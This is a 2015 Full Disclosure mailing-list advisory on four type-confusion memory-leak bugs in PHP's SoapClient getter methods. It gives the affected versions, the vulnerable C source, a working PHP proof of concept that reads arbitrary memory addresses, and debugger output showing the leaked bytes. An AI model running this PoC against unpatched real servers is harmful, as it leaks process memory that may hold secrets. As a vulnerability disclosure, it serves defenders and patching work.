[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Type Confusion Infoleak Vulnerabilities in SoapClient
From: Taoguang Chen <taoguangchen () gmail ! com>
Date: 2015-03-20 12:41:11
Message-ID: CANDcD1U=O0ouvsfwyHrWYbn=BYhREj7+QrWPtSVUxPKVtbLsaQ () mail ! gmail ! com
[Download RAW message or body]
# Type Confusion Infoleak Vulnerabilities in SoapClient
Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.3.1
- Release Date: 2015.3.20
> Four type confusion vulnerabilities were discovered in SoapClient object's some methods that \
> can be abused for leaking arbitrary memory blocks.
Affected Versions
------------
Affected is PHP 5.6 < 5.6.7
Affected is PHP 5.5 < 5.5.23
Affected is PHP 5.4 < 5.4.39
Affected is PHP 5.3 <= 5.3.29
Credits
------------
This vulnerability was disclosed by Taoguang Chen.
Description
------------
```
PHP_METHOD(SoapClient, __getLastRequest)
{
zval **tmp;
if (zend_parse_parameters_none() == FAILURE) {
return;
}
if (zend_hash_find(Z_OBJPROP_P(this_ptr), "__last_request",
sizeof("__last_request"), (void **)&tmp) == SUCCESS) {
RETURN_STRINGL(Z_STRVAL_PP(tmp), Z_STRLEN_PP(tmp), 1);
}
RETURN_NULL();
}
```
The Z_STRVAL_P macro lead to looking up an arbitrary valid memory
address, and return a string via a doubles-type or integer-type zval
that start from this memory address. If the memory address is an
invalid memory position, it should result in a crash.
The Z_STRLEN_PP macro for accessing str.len member from the
zvalue_value union, and return string's length. For integers the
Z_STRLEN_PP macro is generally return 1, so a integer-type ZVAL can
collide a string of length 1. The size of a double is 8 bytes, so on
32bit system a double-type ZVAL can collide a string of any length
The very similar bugs exists in SoapClient object's
__getLastResponse(), __getLastRequestHeaders(), and
__getLastResponseHeaders() methods.
Proof of Concept Exploit
------------
The PoC works on standard MacOSX 10.10.3 installation of PHP 5.5.14.
```
<?php
$z = new SoapClient(null, array('location' => "", 'uri' => ""));
$str = '';
for ($i = 0x100351e3d; $i < 0x100351e3d + 25; $i++) {
$z->__last_request = $i;
$str .= $z->__getLastRequest();
}
var_dump($str);
?>
```
Test the PoC on the command line, then output some memory blocks:
```
$ lldb php
(lldb) target create "php"
Current executable set to 'php' (x86_64).
(lldb) run test.php
Process 6366 launched: '/usr/bin/php' (x86_64)
string(25) "UH??AWAVSPI??I??H????
H"
Process 6366 exited with status = 0 (0x00000000)
```
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic